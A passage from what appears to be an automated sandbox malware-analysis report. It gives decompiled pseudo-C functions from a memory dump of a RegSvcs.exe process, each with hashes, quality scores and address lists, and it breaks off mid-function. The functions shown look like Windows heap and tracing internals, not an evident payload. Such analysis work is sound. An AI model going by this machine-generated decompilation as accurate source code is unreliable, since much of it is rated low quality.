                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cde4a9bcb4be39845a0ef79a8bb5b99beed10a34cb544c0a68fca509488f3ae5
                                          • Instruction ID: 3af1a3e982d090433fb725c2a483e650bf84431692d3a8d11712218a665a59f6
                                          • Opcode Fuzzy Hash: cde4a9bcb4be39845a0ef79a8bb5b99beed10a34cb544c0a68fca509488f3ae5
                                          • Instruction Fuzzy Hash: 6A21F5B2510A459FE321EF6DC944F6BBBECEF91648F040556F940C7251DB38C548C6A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C070D Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E013C070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E013C07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E013BAFDE( &_v8,  &_v12);
					E013C1293(_t38, _v28, _t60);
					if(E01317D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E013B14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                          0x013c071b
                                          0x013c0724
                                          0x013c0734
                                          0x013c0738
                                          0x013c074b
                                          0x013c074b
                                          0x013c0753
                                          0x013c0753
                                          0x013c0759
                                          0x013c075d
                                          0x013c0774
                                          0x013c0779
                                          0x013c077d
                                          0x013c0789
                                          0x013c0795
                                          0x013c07a7
                                          0x013c0797
                                          0x013c07a0
                                          0x013c07a0
                                          0x013c07af
                                          0x013c07c4
                                          0x013c07cd
                                          0x013c07cd
                                          0x013c07af
                                          0x013c07dc

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction ID: 01c5294f57bf8416323faa60434111989fcb082da2d3d735fb1bcbd0afb65167
                                          • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction Fuzzy Hash: 8121223A2042449FD709DF1CC880AAABBA6EBD0B54F04852DFA949B381D630DD09CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C2EF7 Relevance: .1, Instructions: 72COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 35%
                                          			E013C2EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
				char _v5;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				void* _t71;
				signed int _t94;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t114;
				signed int _t115;
				signed int _t141;
				signed int _t142;
				signed char _t145;
				signed char _t146;
				void* _t154;
				signed int _t155;
				void* _t156;
				signed int _t160;
				signed int _t164;
				void* _t165;
				signed int _t172;
				signed int _t174;

				_push(__ecx);
				_push(__ecx);
				_t105 = __edx;
				_t154 = __ecx;
				_t160 =  *__edx ^ __edx;
				_t141 =  *(__edx + 4) ^ __edx;
				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
					_t114 = 3;
					asm("int 0x29");
					_t174 = (_t172 & 0xfffffff8) - 0x24;
					_t62 =  *0x13ed360 ^ _t174;
					_v32 = _t62;
					_push(_t105);
					_push(_t160);
					_t106 = _t114;
					_t115 = _v20;
					_push(_t154);
					_t155 = _t141;
					_t142 = _v16;
					__eflags = _t115;
					if(__eflags != 0) {
						asm("bsf esi, ecx");
					} else {
						asm("bsf esi, edx");
						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
						__eflags = _t62;
						if(_t62 == 0) {
							_t160 = _v44;
						} else {
							_t160 = _t160 + 0x20;
						}
					}
					__eflags = _t142;
					if(__eflags == 0) {
						asm("bsr eax, ecx");
					} else {
						asm("bsr ecx, edx");
						if(__eflags == 0) {
							_t62 = _v44;
						} else {
							_t27 = _t115 + 0x20; // 0x20
							_t62 = _t27;
						}
					}
					_v56 = (_t160 << 0xc) + _t155;
					_v60 = _t62 - _t160 + 1 << 0xc;
					_t71 = E0133D0F0(1, _t62 - _t160 + 1, 0);
					asm("adc edx, 0xffffffff");
					_v52 = E0133D0F0(_t71 + 0xffffffff, _t160, 0);
					_v48 = 0;
					_v44 = _t155 + 0x10;
					E01312280(_t155 + 0x10, _t155 + 0x10);
					__eflags = _a12;
					_push(_v64);
					_push(_v60);
					_push( *((intOrPtr*)(_t106 + 0x20)));
					if(_a12 == 0) {
						 *0x13eb1e0();
						 *( *(_t106 + 0x30) ^  *0x13e6110 ^ _t106)();
						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
						_t54 = _t155 + 8;
						 *_t54 =  *(_t155 + 8) &  !_v64;
						__eflags =  *_t54;
						goto L18;
					} else {
						 *0x13eb1e0();
						_t164 =  *( *(_t106 + 0x2c) ^  *0x13e6110 ^ _t106)();
						__eflags = _t164;
						if(_t164 >= 0) {
							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
							L18:
							asm("lock xadd [eax], ecx");
							_t164 = 0;
							__eflags = 0;
						}
					}
					E0130FFB0(_t106, _t155, _v56);
					_pop(_t156);
					_pop(_t165);
					_pop(_t107);
					__eflags = _v48 ^ _t174;
					return E0133B640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
				} else {
					_t94 = _t141 ^ _t160;
					 *_t141 = _t94;
					 *(_t160 + 4) = _t94;
					_t145 =  !( *(__edx + 8));
					_t146 = _t145 >> 8;
					_v12 = _t146 >> 8;
					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x12dac00));
					asm("lock xadd [eax], edx");
					return __ecx + 0x18;
				}
			}






































                                          0x013c2efc
                                          0x013c2efd
                                          0x013c2eff
                                          0x013c2f03
                                          0x013c2f0a
                                          0x013c2f0c
                                          0x013c2f15
                                          0x013c2fba
                                          0x013c2fbb
                                          0x013c2fc5
                                          0x013c2fcd
                                          0x013c2fcf
                                          0x013c2fd3
                                          0x013c2fd4
                                          0x013c2fd5
                                          0x013c2fd7
                                          0x013c2fda
                                          0x013c2fdb
                                          0x013c2fdd
                                          0x013c2fe0
                                          0x013c2fe2
                                          0x013c2ffc
                                          0x013c2fe4
                                          0x013c2fe4
                                          0x013c2fea
                                          0x013c2fed
                                          0x013c2fef
                                          0x013c2ff6
                                          0x013c2ff1
                                          0x013c2ff1
                                          0x013c2ff1
                                          0x013c2fef
                                          0x013c2fff
                                          0x013c3001
                                          0x013c301b
                                          0x013c3003
                                          0x013c3003
                                          0x013c300e
                                          0x013c3015
                                          0x013c3010
                                          0x013c3010
                                          0x013c3010
                                          0x013c3010
                                          0x013c300e
                                          0x013c302c
                                          0x013c3035
                                          0x013c303c
                                          0x013c3046
                                          0x013c304e
                                          0x013c3056
                                          0x013c305a
                                          0x013c305e
                                          0x013c3063
                                          0x013c3067
                                          0x013c306b
                                          0x013c306f
                                          0x013c3072
                                          0x013c30af
                                          0x013c30b5
                                          0x013c30c1
                                          0x013c30c9
                                          0x013c30c9
                                          0x013c30c9
                                          0x00000000
                                          0x013c3074
                                          0x013c3081
                                          0x013c3089
                                          0x013c308b
                                          0x013c308d
                                          0x013c3093
                                          0x013c309a
                                          0x013c30ce
                                          0x013c30d1
                                          0x013c30d5
                                          0x013c30d5
                                          0x013c30d5
                                          0x013c308d
                                          0x013c30db
                                          0x013c30e6
                                          0x013c30e7
                                          0x013c30e8
                                          0x013c30e9
                                          0x013c30f3
                                          0x013c2f27
                                          0x013c2f29
                                          0x013c2f2b
                                          0x013c2f2d
                                          0x013c2f36
                                          0x013c2f3d
                                          0x013c2f4c
                                          0x013c2f58
                                          0x013c2fad
                                          0x013c2fb7
                                          0x013c2fb7

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 19e0b604bcd7da19dcfd9aa464e98e78cd8d42d453e17fb47406c4b6b2dcef4b
                                          • Instruction ID: 6fc69e2485e8e1fa5029e6108c1bdbc781b2efaff2edbbe24dc3892470752c7f
                                          • Opcode Fuzzy Hash: 19e0b604bcd7da19dcfd9aa464e98e78cd8d42d453e17fb47406c4b6b2dcef4b
                                          • Instruction Fuzzy Hash: 7021DA712041500FD705CF1AC8E59B6BFE5EFC613235A81E9E988CB793C924991BC7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132ABD8 Relevance: .1, Instructions: 70COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E0132ABD8(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				signed char _t22;
				intOrPtr _t31;
				signed char _t34;
				signed char _t42;
				unsigned int _t44;
				void* _t49;
				signed int* _t53;

				_push(__ecx);
				_t49 = __ecx;
				_t18 = __ecx + 0xc0;
				_t31 =  *((intOrPtr*)(_t18 + 4));
				while(_t31 != _t18) {
					_t9 = _t31 - 8; // -8
					_t53 = _t9;
					if( *(_t49 + 0x4c) != 0) {
						_t44 =  *(_t49 + 0x50) ^  *_t53;
						 *_t53 = _t44;
						_t38 = _t44 >> 0x00000010 ^ _t44 >> 0x00000008 ^ _t44;
						if(_t44 >> 0x18 != (_t44 >> 0x00000010 ^ _t44 >> 0x00000008 ^ _t44)) {
							E013AFA2B(_t31, _t49, _t53, _t49, _t53, __eflags, _t38);
						}
					}
					_t34 =  *_t53 & 0x0000ffff;
					_t18 = 0x200;
					_t42 = _t34 >> 8;
					if(_t34 <= 0x200) {
						__eflags =  *(_t49 + 0x4c);
						if( *(_t49 + 0x4c) != 0) {
							_t53[0] = _t53[0] ^ _t42 ^ _t34;
							_t18 =  *(_t49 + 0x50);
							 *_t53 =  *_t53 ^ _t18;
							__eflags =  *_t53;
						}
						break;
					}
					_t22 = _t53[0];
					if((_t22 & 0x00000008) != 0) {
						__eflags =  *(_t49 + 0x4c);
						if(__eflags != 0) {
							_t53[0] = _t22 ^ _t42 ^ _t34;
							 *_t53 =  *_t53 ^  *(_t49 + 0x50);
							__eflags =  *_t53;
						}
					} else {
						E0132AC7B(_t49, _t53);
					}
					_t31 =  *((intOrPtr*)(_t31 + 4));
					_t18 = _t49 + 0xc0;
				}
				return _t18;
			}















                                          0x0132abe0
                                          0x0132abe4
                                          0x0132abe6
                                          0x0132abec
                                          0x0132ac0c
                                          0x0132ac14
                                          0x0132ac14
                                          0x0132ac17
                                          0x0132ac1c
                                          0x0132ac20
                                          0x0132ac2c
                                          0x0132ac33
                                          0x01369f40
                                          0x01369f40
                                          0x0132ac33
                                          0x0132ac39
                                          0x0132ac3c
                                          0x0132ac44
                                          0x0132ac4b
                                          0x0132ac5f
                                          0x0132ac63
                                          0x0132ac6c
                                          0x0132ac6f
                                          0x0132ac72
                                          0x0132ac72
                                          0x0132ac72
                                          0x00000000
                                          0x0132ac63
                                          0x0132ac4d
                                          0x0132ac52
                                          0x0132abf1
                                          0x0132abf5
                                          0x0132abfb
                                          0x0132ac01
                                          0x0132ac01
                                          0x0132ac01
                                          0x0132ac54
                                          0x0132ac58
                                          0x0132ac58
                                          0x0132ac03
                                          0x0132ac06
                                          0x0132ac06
                                          0x0132ac7a

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
                                          • Instruction ID: e58aaea45ee97588d61515fdde74b49b0efe0a0990df9c36f99e9764f721ae95
                                          • Opcode Fuzzy Hash: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
                                          • Instruction Fuzzy Hash: 33210A312006369BDF28AF2DC4846F2BBD9FF99309F54811AD5D5C7A41D730B80ADB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01377794 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E01377794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x13e7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0133F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01317D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01339AE0();
					_t24 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                          0x01377799
                                          0x0137779a
                                          0x0137779b
                                          0x013777a3
                                          0x013777ab
                                          0x013777ae
                                          0x013777b1
                                          0x013777b1
                                          0x013777bf
                                          0x013777c4
                                          0x013777c8
                                          0x013777ce
                                          0x013777d4
                                          0x013777e0
                                          0x013777e0
                                          0x013777d6
                                          0x013777d6
                                          0x013777de
                                          0x00000000
                                          0x00000000
                                          0x013777de
                                          0x013777e5
                                          0x013777f0
                                          0x013777f3
                                          0x013777f6
                                          0x013777fd
                                          0x01377800
                                          0x0137780c
                                          0x01377818
                                          0x0137782b
                                          0x0137781a
                                          0x01377823
                                          0x01377823
                                          0x01377830
                                          0x01377831
                                          0x01377838
                                          0x0137783d
                                          0x0137783e
                                          0x0137784f
                                          0x0137784f
                                          0x0137785a

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 49ce2574adcf4907c97aab7eacb92a80114ea003c32853db1d74dabd083970d2
                                          • Instruction ID: 0da9eee45984361ad6ce42dbe807447ed74bfef29810e3e4ff9bd28fd1a9e506
                                          • Opcode Fuzzy Hash: 49ce2574adcf4907c97aab7eacb92a80114ea003c32853db1d74dabd083970d2
                                          • Instruction Fuzzy Hash: 0521AE72900644AFC725DF69D884EABBBBDEF88344F14056DF60AC7760D638E900CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C1FF1 Relevance: .1, Instructions: 70COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E013C1FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
				intOrPtr _v8;
				signed int _t22;
				signed int _t34;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				signed int _t44;
				signed int _t54;
				signed int _t55;

				_t44 = _a4;
				_v8 = __edx;
				_t3 = _t44 + 0x1007; // 0x1007
				_t41 = _t3 & 0xfffff000;
				_t54 = ( *_t44 ^  *0x13e6110 ^ _t44) >> 0x00000001 & 0x00007fff;
				if(_t41 - _t44 < _t54 << 3) {
					_t42 = _t41 + 0xfffffff0;
					_t34 = _t42 - _t44 >> 3;
					_t55 = _t54 - _t34;
					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x13e6110 ^ _t44) & 0x0000fffe;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
					 *_t42 = _t22;
					_t38 = _t42 + _t55 * 8;
					 *_t42 = _t22 ^  *0x13e6110 ^ _t42;
					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x13e6110 ^ _t38 ^  *_t38) & 0x7fff0000;
					}
				} else {
					_t42 = 0;
				}
				return _t42;
			}












                                          0x013c1ff9
                                          0x013c1ffc
                                          0x013c2001
                                          0x013c200d
                                          0x013c201b
                                          0x013c2028
                                          0x013c202e
                                          0x013c2035
                                          0x013c2038
                                          0x013c204c
                                          0x013c2052
                                          0x013c2053
                                          0x013c2054
                                          0x013c2055
                                          0x013c2069
                                          0x013c206c
                                          0x013c206e
                                          0x013c2079
                                          0x013c2087
                                          0x013c209c
                                          0x013c209c
                                          0x013c202a
                                          0x013c202a
                                          0x013c202a
                                          0x013c20a5

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b275536d2fc9836d7c7b55162a5d71804b097da0e4b2074bb4fb31608e9d51e8
                                          • Instruction ID: 1e0d13e265669ce901d92c702ef79f23f8be0e42e5ec9e36400f1c67ba10ea0f
                                          • Opcode Fuzzy Hash: b275536d2fc9836d7c7b55162a5d71804b097da0e4b2074bb4fb31608e9d51e8
                                          • Instruction Fuzzy Hash: 8521C033A105259BCB29CB3CC801466F7EAEF8C31472A467ED812DB2A5EA70BD11C780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131AE73 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E0131AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01317D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01317D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01317D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01317D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01377794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                          0x0131ae78
                                          0x0131ae7c
                                          0x0131ae7e
                                          0x0131ae81
                                          0x0131ae86
                                          0x0131ae8d
                                          0x01362691
                                          0x0131ae93
                                          0x0131ae93
                                          0x0131ae93
                                          0x0131ae98
                                          0x0131ae9d
                                          0x013626a2
                                          0x013626b4
                                          0x013626a4
                                          0x013626ad
                                          0x013626ad
                                          0x013626b9
                                          0x00000000
                                          0x013626bb
                                          0x00000000
                                          0x013626bb
                                          0x0131aea3
                                          0x0131aea3
                                          0x0131aea3
                                          0x0131aeaa
                                          0x013626c0
                                          0x013626c9
                                          0x013626c9
                                          0x0131aeb3
                                          0x013626d4
                                          0x013626e1
                                          0x00000000
                                          0x00000000
                                          0x013626e7
                                          0x013626ee
                                          0x013626f0
                                          0x013626f9
                                          0x013626f9
                                          0x01362702
                                          0x01362708
                                          0x01362708
                                          0x0136270b
                                          0x0136270f
                                          0x01362711
                                          0x01362711
                                          0x01362725
                                          0x01362725
                                          0x00000000
                                          0x0131aeb9
                                          0x0131aeb9
                                          0x0131aebf
                                          0x0131aebf
                                          0x0131aeb3

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction ID: be961c2e7560184089425aab88da90e4833a33f1583d6c979b9e19fd6ed87980
                                          • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction Fuzzy Hash: 0321F9716026859FE71A9B2DC944B267BECEF44358F0A00A0DD048B75AD778DC40C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132FD9B Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E0132FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E013076E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                          0x0132fd9b
                                          0x0132fda0
                                          0x0132fda1
                                          0x0132fdab
                                          0x0132fdad
                                          0x0132fdb0
                                          0x0132fdb8
                                          0x0132fe0f
                                          0x0132fde6
                                          0x0132fde9
                                          0x0132fdec
                                          0x0136c0c0
                                          0x0132fdfe
                                          0x0132fe06
                                          0x0132fe06
                                          0x0136c0c8
                                          0x0132fe2d
                                          0x0132fe2d
                                          0x00000000
                                          0x0132fe2d
                                          0x0136c0d1
                                          0x0136c0e0
                                          0x0136c0e5
                                          0x0136c0e5
                                          0x0136c0e8
                                          0x00000000
                                          0x0136c0e8
                                          0x0132fdf4
                                          0x00000000
                                          0x00000000
                                          0x0132fdf6
                                          0x0132fdfa
                                          0x0132fe1a
                                          0x0132fe1f
                                          0x0132fe1f
                                          0x0132fdfc
                                          0x00000000
                                          0x0132fdfc
                                          0x0132fdcc
                                          0x0132fdd0
                                          0x0132fe26
                                          0x00000000
                                          0x0132fe26
                                          0x0132fdd8
                                          0x0132fddb
                                          0x0132fddd
                                          0x0132fde0
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction ID: c0b0583a4c1a3825b20468eb574301a58e42d9be7423ca2a3028a86f08d56077
                                          • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction Fuzzy Hash: 1621A972600A54DBD736DF0DC540E66F7F9EB94A18F24856EE95A87A19D730EC00CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0130841F Relevance: .1, Instructions: 64COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E0130841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
